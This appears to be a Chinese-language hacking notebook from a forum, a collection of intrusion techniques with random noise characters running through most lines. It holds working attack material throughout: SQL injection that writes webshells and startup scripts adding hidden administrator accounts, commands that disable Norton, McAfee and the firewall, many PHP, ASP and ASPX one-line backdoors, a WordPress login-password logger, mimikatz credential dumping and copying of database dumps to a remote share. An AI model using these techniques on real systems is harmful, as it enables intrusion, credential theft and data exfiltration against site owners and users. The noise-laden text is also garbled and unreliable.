insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
! G0 H2 c2 ~/ z* S3 L, L) Xinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
$ _7 K( s |8 v4 P; Q @3 w6 ~select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";# N O6 T0 j+ D- Y+ A$ h+ `
drop table a;
+ w" U9 V; l- g: u
( z$ K) b0 O4 t# Z$ C( y, i' r英文版本:1 c3 ^2 E5 x* O& B& U8 u% Q
, Z! J X" i3 r4 }use test;, P1 O6 {& h& }
create table a (cmd text);
# i5 S8 }- F# M; b& |/ [insert into a values ("set wshshell=createobject (""wscript.shell"") " );$ e1 }2 n2 \& N }) q+ o; s
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 h- I. R o( O/ Y5 B$ j( ~" Q
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; d4 A' o# [ Z1 W# cselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";5 \- C- b0 R% p5 G
drop table a;
' K! ?0 S- ]' e/ t( I- n! `$ q" g' g: J, ~' m+ i
create table a (cmd BLOB);
$ _$ X* d! Z3 Z1 yinsert into a values (CONVERT(木马的16进制代码,CHAR));. ]+ \" t: }! _$ s, J8 S
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
$ l, Q( j8 I, B* c+ Adrop table a;
+ Y3 ?- Q* e4 o7 Y
$ h9 ~4 b/ Q6 W& a& O记录一下怎么处理变态诺顿1 M" m7 e( y& k* y
查看诺顿服务的路径
) d# {+ H* x% `# Isc qc ccSetMgr
/ ^2 W) z0 G+ ]然后设置权限拒绝访问。做绝一点。。+ I4 ~* Z$ c9 a2 D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
& Z- F# Y: ?& B% m! d+ Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
1 z5 k2 G l V( i1 lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators4 O4 r; C6 E1 t5 r- |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
) z* ^9 r! Q3 J8 B# W. G
: w% F r& m# C' H- S/ y. I! d然后再重启服务器
* m6 e! Z# W0 x: k& A' `; wiisreset /reboot
* y$ j6 a/ s9 B5 [8 z这样就搞定了。。不过完事后。记得恢复权限。。。。% O; |* J9 o4 u: G9 F0 R
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
- ~! G8 S2 ]" l6 Q( L- B0 |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
+ ]8 m5 K3 t8 rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
+ o' v1 d1 g8 Q5 p5 q) z% dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F8 N- b5 A |9 m
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
- t' K% s% A1 B. B
5 L1 w4 X6 m4 fEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
2 y' A- F' s' m2 ?7 M5 L0 ], n" |5 M! T5 }
postgresql注射的一些东西" \+ @ g$ N# C/ O
如何获得webshell# x$ I7 d K* t" a6 o6 e, z
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
, d- G2 L5 l- p$ {; zhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); - n) i9 J+ w7 j; p' p, X
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
% S, s4 z0 `9 u' ~+ ?3 A如何读文件
/ x- {3 ]: c! r* Ihttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);& T1 q! E6 L( l3 N; x) R
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
8 o/ q% W5 n: bhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
# M4 i3 A0 p, `' Z* y; ]8 W3 h$ ?3 k9 j7 }5 `8 r0 T
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
. L# @ N5 i( f4 h2 N当然,这些的postgresql的数据库版本必须大于8.X; n3 a" w1 M8 M( v4 @
创建一个system的函数:3 D( M5 |4 t% }6 `! ~$ z/ r( l$ v5 W. N
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT. p9 B% [: W. T& I8 a( z, m, [/ _7 v
5 F2 R/ A) |& G创建一个输出表:
% ^, x' _5 o" W* jCREATE TABLE stdout(id serial, system_out text)1 `% J. ]8 y$ L; y
7 n7 H$ H. }3 s! G执行shell,输出到输出表内:
! D) {9 c8 q7 l. p% T9 d, gSELECT system('uname -a > /tmp/test')
. w$ |9 s8 n! t& g" h4 ?
8 \/ k& e0 j3 }" L8 A1 x8 u6 h4 Tcopy 输出的内容到表里面;8 }6 k( M# b* ^5 |; z4 {
COPY stdout(system_out) FROM '/tmp/test'
; c! U$ L, S0 }# {$ s/ V1 @4 H- f. ?+ |3 `
从输出表内读取执行后的回显,判断是否执行成功
/ M. p6 n. z( Z$ c3 s2 m4 @) n9 @& b! W8 \. l7 L% w' K0 n! l
SELECT system_out FROM stdout
7 }; u8 l2 b+ S下面是测试例子
) u7 @3 Z2 J4 _+ y
5 _/ U9 i. D4 q, |/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
7 ]+ b; s0 P# j N8 r+ e8 l' w, Q9 [# t' D
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
- t% x n A6 rSTRICT --
( o p* R# }6 K# A) i1 E
+ V# z( d5 C6 e1 A A, M- @/store.php?id=1; SELECT system('uname -a > /tmp/test') --
+ v- U, Z- F- G: I4 w- e# y2 w, {
* p6 Y8 d/ g) Z H6 [( H/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
K! I+ l- r, ?# u" f$ G
. p+ m3 d$ Q" ~' K# u8 A. ?' d/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
1 ]& i* d5 m3 l; j; Enet stop sharedaccess stop the default firewall4 n0 q% v; u# U, C# ~; P0 Y
netsh firewall show show/config default firewall
) K& \& i! Y1 d# L' U$ n; anetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall6 _) i/ V9 E2 @
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall* v- R7 |! [4 W, v+ Z
修改3389端口方法(修改后不易被扫出)
2 @# {9 h8 Y- a5 a修改服务器端的端口设置,注册表有2个地方需要修改/ O7 O0 o/ G+ \' ^( ]/ S l
( L. x) A) i% l% K8 d
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
; S+ g3 z/ _% K9 v% l0 zPortNumber值,默认是3389,修改成所希望的端口,比如6000: g' I. }) }+ q2 S/ V" _/ M; h3 J N
5 x; R: x3 E$ k' }0 w: E, D
第二个地方:
1 L2 [/ A9 d9 i# W' V[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
- z d/ k8 T+ l4 o5 |3 k! U g6 XPortNumber值,默认是3389,修改成所希望的端口,比如6000
) c$ J) a) W; i# p+ X/ G- n
, k d" r. _( P C' x# O现在这样就可以了。重启系统就可以了
! h" T0 R( K- i/ w
$ f' g3 H: ]: i( f* J查看3389远程登录的脚本9 u$ ^9 I# w) I5 G* C! U$ z
保存为一个bat文件4 i" l9 L# J& E& X3 n
date /t >>D:\sec\TSlog\ts.log
. ~" H* L" ]2 Itime /t >>D:\sec\TSlog\ts.log
6 D: x" Q* Z' Lnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log5 |: \$ Y C) z& n. }
start Explorer
" I9 g* P$ B- {
- n& e2 v {1 _8 D0 r3 ~6 ~; g. Nmstsc的参数:5 o/ [$ Z6 l# k. Y. S
. W( C- R9 n, e! H B, j9 h
远程桌面连接
. Q; \1 J8 b( {7 y3 ?/ d" x/ T4 v5 o3 \) U
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]4 X! \1 Q3 Q( y2 f$ Y$ i6 u
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
# i1 c& C8 D7 f3 K. Y( f: k' o: d4 F( r5 P1 ?6 W
<Connection File> -- 指定连接的 .rdp 文件的名称。% N7 o/ r8 T1 z' C; \
. g$ r% _$ X$ [) {( b
/v:<server[:port]> -- 指定要连接到的终端服务器。
1 T9 w0 S/ J6 H T5 X+ G% [4 M" F! V+ Z! A" y" {
/console -- 连接到服务器的控制台会话。. i: D* r: k! v) y
/ e" D1 o [& ?5 D& _: Z4 ]/f -- 以全屏模式启动客户端。7 l9 x" k# ^* }2 `
; z9 v! A* U4 F; N/ K5 w/w:<width> -- 指定远程桌面屏幕的宽度。
9 x9 Z* o6 s" c6 @
4 c! q2 _( }: h# T/h:<height> -- 指定远程桌面屏幕的高度。5 Z; p& K* Q* [ D; |" S' g
/ A, a) d7 H' I# I/ f" O4 |* f8 [) d
/edit -- 打开指定的 .rdp 文件来编辑。
* z- X' g- _7 c6 Q, C# v. z1 Y8 r) E/ g/ T
/migrate -- 将客户端连接管理器创建的旧版
/ b& a4 `9 Z( `2 H# Q3 T: @) R6 E8 y$ P连接文件迁移到新的 .rdp 连接文件。3 D# W; o+ g8 j; ~
" F% }; w2 {5 e3 G7 j# ]- H: k1 A
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
' e- L/ N3 j( @mstsc /console /v:124.42.126.xxx 突破终端访问限制数量. q8 z! X; R4 }2 i
& _" x0 m3 S/ }命令行下开启3389
% r0 m1 L9 ?1 _5 Vnet user asp.net aspnet /add
% V; s, Y1 y; r% y" Y6 Knet localgroup Administrators asp.net /add" k0 G" m6 U o1 e
net localgroup "Remote Desktop Users" asp.net /add; m3 @1 D7 I; y/ }/ p
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D! o" |, X) c3 g. }6 f
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
) a/ ^/ e7 K7 Mecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1$ ^7 M, Y; G- o! @3 \5 J
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f$ ]* t" X! x3 C9 j, Q
sc config rasman start= auto
: R0 g) E( V) {; `3 Q/ u+ Nsc config remoteaccess start= auto
) a& k; u- M/ O' f/ unet start rasman, r: f1 h8 s% w6 X" E! n+ E( c0 H( R. e
net start remoteaccess" n6 u h$ G5 H7 l- ~3 H7 n0 y9 V( B/ \
Media
8 ~5 o! H$ N2 f<form id="frmUpload" enctype="multipart/form-data"8 \5 [! z8 T0 m2 m/ k( W" e0 w
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
% V" F6 {; E8 n: @% |9 |- h% [' [<input type="file" name="NewFile" size="50"><br>
0 Y0 Q: r" |; \! j. d<input id="btnUpload" type="submit" value="Upload">. l) }8 C. e; M* `- b
</form>
( H* R0 ^. |, z. r' @$ |" _2 h C: ^. N/ I5 U4 b
control userpasswords2 查看用户的密码: g5 u$ K: {- q7 A' w5 D3 r
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
+ G( v/ Q G( `. [" R* aSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, t, R5 m7 ]0 x2 Q- }* w/ H
& X: Q8 d5 F, n$ L; t2 h
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
; w* [! p- ^, q' e测试1:
) S7 v% V* q; p6 i8 pSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% D) b, S9 I: }2 l7 z
M! b- J2 W( `测试2:. H: m7 L& C9 i8 B% y: y
% j6 Y' }9 ~2 Y9 @; d. vcreate table dirs(paths varchar(100),paths1 varchar(100), id int)1 h5 w0 l# n* O
5 Y* t! `) K& G. {delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
# r5 E) c1 V' h F5 @! K/ W" o7 \0 y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
/ v: y" q5 |5 v8 V; h. D [关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
) i' B* v$ y' ?$ Q( q8 G可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;5 I+ E) b3 d& L9 b# S
net stop mcafeeframework9 S4 m4 t) \9 `
net stop mcshield
6 E, A. l% O) P. j. o7 X' k6 l Xnet stop mcafeeengineservice
3 t7 |) L, `* Gnet stop mctaskmanager
0 G- Q9 J6 h; @8 R2 h# g0 L5 k- Mhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
. q8 x5 b! C) t0 X
7 p+ l: L K. @! u- e0 c! N VNCDump.zip (4.76 KB, 下载次数: 1)
6 I7 l0 ]/ Q7 s8 V6 M: j) ^- E密码在线破解http://tools88.com/safe/vnc.php
- t5 v0 {0 s9 [) ?9 Q8 H& l' V2 U L/ {VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
" v- N# F+ I* f' t- _' z1 r. F) C* |' t6 P
exec master..xp_cmdshell 'net user'3 W; G1 |6 |$ M% g1 M0 r
mssql执行命令。
* j4 V! N) f" t获取mssql的密码hash查询
/ c5 _9 `" j1 sselect name,password from master.dbo.sysxlogins4 j4 ~0 @, U/ k' l8 G7 p
. y0 I$ m( ~3 nbackup log dbName with NO_LOG;
, l2 t) U5 ]3 ]3 R* `: z# |backup log dbName with TRUNCATE_ONLY;) I5 s2 J# i& y2 J3 f6 ^
DBCC SHRINKDATABASE(dbName);1 J) S6 s+ J) c' V& z$ e' h
mssql数据库压缩5 c1 A; h, Z5 ~3 x0 \
9 w, v4 [0 o- \5 t& {3 x1 L2 ?
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
& L* D! u2 p$ G# j4 Y7 e: W% g) P将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。6 g- W$ Y% s ?
" e) R4 M# e+ f# X1 {! F% k ^
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
3 X4 f6 P3 u Y. Y备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
/ o2 q# x! x7 y8 J6 [6 y, j5 r8 E5 {1 Z7 M1 }) b
Discuz!nt35渗透要点:
# M8 U; @3 B1 Z3 q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default6 V( t! e# @1 q% A. ~! I' `( {3 G
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>, Q6 H$ j2 ]9 Q# Z4 n K
(3)保存。' d( X9 G& ^2 Z" M p
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass3 {$ v, D R g5 s( d, S6 ]5 t9 B. A
d:\rar.exe a -r d:\1.rar d:\website\/ u c' ?" @' `- y; d& r
递归压缩website+ {# c4 q4 [9 P
注意rar.exe的路径 d6 ~* v7 q$ j3 k. r5 B! z
& K' ]$ R+ R2 L
<?php
& z4 J' s. L- U, V" L7 g; `" f1 ~
$telok = "0${@eval($_POST[xxoo])}";
9 e) R, f- ^) S9 l
r8 d, q+ x7 R: A0 w5 s+ p$username = "123456";9 y0 z$ F; D2 s9 u& x- t* m
& _1 C2 v2 `% D1 N5 w; s( ^/ G; X9 u
$userpwd = "123456";% D* N0 z0 `, D7 Q) _
- X' ]' b; n& r, Z5 e2 [3 M. o
$telhao = "123456";& n7 u- x. c/ U W+ }% f
) x, ]3 u2 A. y; z1 Z. s2 W' V
$telinfo = "123456";; k3 L+ F8 {# d* O& y. u: n
" I2 ]; A2 ~2 a2 l?>3 T* [# M7 i7 K3 q
php一句话未过滤插入一句话木马
3 B5 ?8 n! H7 j! x, f
! [, p3 W F. T' }站库分离脱裤技巧
" A- \* r7 l& |5 h! mexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'5 O* i5 T+ X2 x- F# l
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'6 K. e8 F- \0 w* e& d! F
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。. Z( O; h5 W- V: M I( F. {$ s; M) ?
这儿利用的是马儿的专家模式(自己写代码)。
& S$ K+ o" e4 p5 n7 vini_set('display_errors', 1);6 f1 p' a& a! m
set_time_limit(0);% n2 W" L8 |% l- c! C$ j
error_reporting(E_ALL);0 U; d" s* Y: A& g! I2 e$ t7 f
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
- y( m% ] f! X5 D3 R# umysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
: X, D/ x% x/ r& K- f, @* \% O$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
% L( u% t0 P* c, c7 {# f4 i$ a$i = 0;
! Q# r% {6 F# T8 W! T, R$tmp = '';
; V R( s. ]1 p9 ]' d5 Q, Qwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
I! n' \9 O$ t( Y $i = $i+1;3 s# \' z. Y( {3 E. {/ z) f
$tmp .= implode("::", $row)."\n";. |- d4 F) a3 A! o b% c
if(!($i%500)){//500条写入一个文件+ P# l8 ] N3 w3 D3 ^
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
0 E6 @3 o8 P5 T$ m! E* d3 @ file_put_contents($filename,$tmp);
8 Q6 L$ s/ y3 o( X4 c8 E $tmp = '';. C$ q. d# Y1 t" t9 o/ X$ n1 v) I
}
* V$ V& q& c# |% e}
# E. F; B2 G5 g+ Jmysql_free_result($result);# Y6 w6 V; C' U6 m8 Q/ Z. u
8 {; ^" h q( `+ c; I+ C
2 h& m( m; V% o9 ]. [4 L! N6 u
+ E4 Q) o# g, i+ K `/ ^, e//down完后delete7 S, |9 C9 U5 G0 e x
5 ] r; ?: O+ b" ^2 o& ~8 g% q" Y& ]' E& _; i
ini_set('display_errors', 1);
^* u0 B; T* k/ ~9 H) lerror_reporting(E_ALL);
: ^# n1 [/ z8 G/ H8 |$i = 0;/ p. J) A# y! }: P ~+ F6 ?9 {' P
while($i<32) {
7 v" ?" y$ C3 P. m3 ^2 c $i = $i+1;; }8 R8 Z5 `- e! k7 @
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';. }* O# I/ t+ r0 `7 ^3 o4 H
unlink($filename);) {( v1 a1 \* Q9 ?; @ E6 |0 @
}
6 M5 n* y* f/ a& r9 h0 [/ Ahttprint 收集操作系统指纹8 i! b5 K! E5 Q; z
扫描192.168.1.100的所有端口8 u, w% L6 A5 W4 _+ j
nmap –PN –sT –sV –p0-65535 192.168.1.100! L/ s" c- j0 N/ W R+ c
host -t ns www.owasp.org 识别的名称服务器,获取dns信息, `- j2 v; Q; P& J6 R2 J
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输- N4 ]+ f" v' k0 q, H) f; z
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
4 C4 e! ~' s5 x* M, T: `
6 T! a" Z' D% R+ yDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. l" a$ o% E1 \% l8 Q) H0 q* z: u! I T; k
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)! S$ Z# ] A% E+ A7 j
% a: K' O7 \2 t# x Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x! c$ C7 C) J- p. k% ?- y
: C! F t! W, U DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
+ f1 }! m/ S/ h! K" W
: ?, ?) i- x; P& F0 C$ R; H http://net-square.com/msnpawn/index.shtml (要求安装)
. P8 _6 Z% u( p3 u: b Z9 l. I* N3 T$ \$ ^" U9 Z' H1 i) ^
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)2 R* G- k8 E% a ~
" o- [8 C Z, M9 Z( v8 M9 W9 \ SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)$ e- M$ E$ c: ^, P
set names gb2312% h; A# |; R( E! h! I+ q
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
* l. h2 K: p4 ^; y% n; A
- r1 q" e& W2 z# X* a/ {mysql 密码修改& E: s9 C+ `: X; K8 d9 \
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
) N3 G" B" C- U6 ]3 c& yupdate user set password=PASSWORD('antian365.com') where user='root';
$ L. z! j5 c/ y T! `+ Iflush privileges;
: |. K" |! g" ~% X高级的PHP一句话木马后门
7 c9 K" s# y+ J, @$ V5 w3 [" y. ?# @" ^) S, C; {8 [
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
* o: a5 D& {. S8 J: u- ^% D- u# f& b$ l/ q$ s) K8 `0 i- S' U
1、& b$ F: _1 @/ f5 ?1 H) p" b
' `9 k% \4 H0 ?3 n
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";7 v. l6 m6 b# ^$ }
7 O k& m9 q' c$ O0 t7 c$hh("/[discuz]/e",$_POST['h'],"Access");6 `- N7 F: i) Y) b2 b) s k( ?
( X. H- R2 K2 j, h# U) k//菜刀一句话4 L# R8 Y5 e7 b% c& _# B
. {" ?- G0 {$ ]8 ]: H0 v. `
2、- K/ b( _6 _& h4 U; K
3 [" O! [* H; t- R' |! l
$filename=$_GET['xbid'];
' d& Q6 p. s' O Y- c$ c
6 Q4 @5 m. R T% |include ($filename);
2 @) _: t0 [7 I# k# T/ K7 f3 s$ a
3 l" z- Z, o) u# m2 V2 J& l//危险的include函数,直接编译任何文件为php格式运行
% \, o3 c, A1 o+ D; P
% S. _5 f* d, _2 Z3、
7 O6 K# r: t2 N7 m ~0 y, _) \2 p5 v' i7 V1 `+ b8 W% \: [* P
$reg="c"."o"."p"."y";
5 Y0 [- b! y1 C, ~. ?% M
u2 ?' t& w% D8 Z7 [2 `$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
9 _ a+ v5 }$ }; C$ x7 R& a2 _8 c3 a; l" |! K2 O- m( x
//重命名任何文件
# K* F* m8 ?; G( k* Q, T
, q- N t7 E2 M) I$ ?( ]# p4、0 v& O. e: T* u" b% \4 V7 E
; @* }& O f' u& ^$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
* ^( M! n+ `- ~4 a. C
' o) L# h' Y" B$ e! T2 m! V4 Z$gzid("/[discuz]/e",$_POST['h'],"Access");
, b; n( _6 M, e( f% V; X' a
( Z2 W* y* C6 b: V0 J//菜刀一句话( `/ _: B4 Y" o. ]
2 z! n2 M! u1 ]% N. ^
5、include ($uid);
! O% k$ i1 ~0 K, @* h: H; Q. {# _% Y4 k% N0 A9 p5 ~
//危险的include函数,直接编译任何文件为php格式运行,POST
. K, l" c7 D* R; O, P" p% h) [) m* r. n3 E$ p
3 i: f0 z! H+ i: n1 d( y S( P6 k
//gif插一句话
d3 ^) e& I/ ]4 F8 V$ Q* _* Y) g2 m8 T( k, T
6、典型一句话# T# J' _; s0 w" L; s1 r
`0 o& }& x! c$ Y3 T3 x程序后门代码8 v" G0 A+ D) z* d% t
<?php eval_r($_POST[sb])?>4 Z$ I3 o/ P% u9 A: r* I( \
程序代码+ @ v1 W2 b; K7 ^
<?php @eval_r($_POST[sb])?>5 p# L. @1 x/ Q8 k$ z- z# N
//容错代码
* ~) P8 E* W( \程序代码* Z' p2 ^# @5 D( S7 x# i z
<?php assert($_POST[sb]);?>" A! \- o3 Q1 ]6 F; }# k
//使用lanker一句话客户端的专家模式执行相关的php语句
2 z6 V9 {1 E( d# L3 B5 S J程序代码
" e* l$ Q& A1 _2 Z; A<?$_POST['sa']($_POST['sb']);?>! H0 }. Q: ~ r, `
程序代码
# j4 D0 x" G, N& ] ^# w0 s<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>) i0 [5 J- Y/ V! `5 R
程序代码- n" ^6 F+ i/ f* t, t2 q7 R& V
<?php0 ^# E4 v2 ?# l6 a0 L
@preg_replace("/[email]/e",$_POST['h'],"error");$ N) j J5 V! S" j. O0 E: `5 Y+ t
?>' k E! X/ x- c$ B. [1 Y
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
x; J- F: Y- Q9 m. L/ k* a; r程序代码
; e& @. D8 k# a6 F: f7 w$ S<O>h=@eval_r($_POST[c]);</O>& K' X% L# j& f9 ]
程序代码' g' a* i0 `" a" x( h% d6 R- @# O
<script language="php">@eval_r($_POST[sb])</script>
` e" Y, n8 Z. }//绕过<?限制的一句话" @+ v, x9 k! U
% {3 Y" g+ w a2 q7 P' Dhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
7 p p# s H8 J6 A8 ~1 p/ F详细用法:: v, i* a& M' ]' h7 D0 t8 E
1、到tools目录。psexec \\127.0.0.1 cmd/ d5 O1 B% D5 b/ j/ y5 @
2、执行mimikatz
5 w6 U, l: _- b' @% x& B& R3、执行 privilege::debug
6 @' }0 K$ A( H5 j; R& i4、执行 inject::process lsass.exe sekurlsa.dll
/ ]2 X) x9 W! z9 T! f5、执行@getLogonPasswords
" t2 Z9 u1 Z1 N* ~7 T6、widget就是密码7 k a. p* a" q9 h8 x, @3 N
7、exit退出,不要直接关闭否则系统会崩溃。- I5 k0 j( Z0 S9 O/ c$ ?
, o, b9 E8 [& t; Z0 E# dhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
+ R! J& ^5 h; _
! j, x/ {6 ?4 y自动查找系统高危补丁
+ V( c- W% z. W+ B+ J" gsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
. M9 L8 |+ J4 T) x5 y: B3 f- X
0 j8 Z6 G. l$ j& H- B+ j% T突破安全狗的一句话aspx后门/ }1 i6 ` E/ v) ^
<%@ Page Language="C#" ValidateRequest="false" %>
5 i8 H$ e& K$ N5 w9 ~+ o<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
- I s4 N, [7 Xwebshell下记录WordPress登陆密码& ?+ O. s( I3 D% s5 R% l" J" Q
webshell下记录Wordpress登陆密码方便进一步社工
6 H0 O7 }; V* |0 G: ^5 O0 y0 S& p在文件wp-login.php中539行处添加:
9 H( F1 i0 n4 b// log password
9 y0 A9 z. @; x6 W5 s$log_user=$_POST['log'];
' I& c! x/ e! }* {$log_pwd=$_POST['pwd'];4 M; h$ \1 d3 V6 T. ~
$log_ip=$_SERVER["REMOTE_ADDR"];
$ x, H4 i" W1 Q4 @# [$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;" l4 K# _% l# e* a% q. b
$txt=$txt.”\r\n”;
1 x5 n& p3 P7 Wif($log_user&&$log_pwd&&$log_ip){8 C2 } l0 j# d5 i. g
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
! |: Z, L, s' i$ V5 B, O' J}) {5 H5 D! O8 J8 u
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
! S# b! |0 f5 {& X9 @2 a就是搜索case ‘login’( @. S- M t9 U" G4 b- o
在它下面直接插入即可,记录的密码生成在pwd.txt中, z4 B" \4 S- b# {% c" d- p
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录. C9 b+ s8 ~$ c" Z
利用II6文件解析漏洞绕过安全狗代码:' O: {# f' U+ M1 D4 v6 E( {
;antian365.asp;antian365.jpg/ x3 U7 C3 `& o
# B! d+ T& _; Z" O# k各种类型数据库抓HASH破解最高权限密码!
2 \; I# c& o" F# i$ H4 n8 |2 s! X1 p1.sql server2000
6 @: a' K; o8 s0 d6 l: I! ~SELECT password from master.dbo.sysxlogins where name='sa'
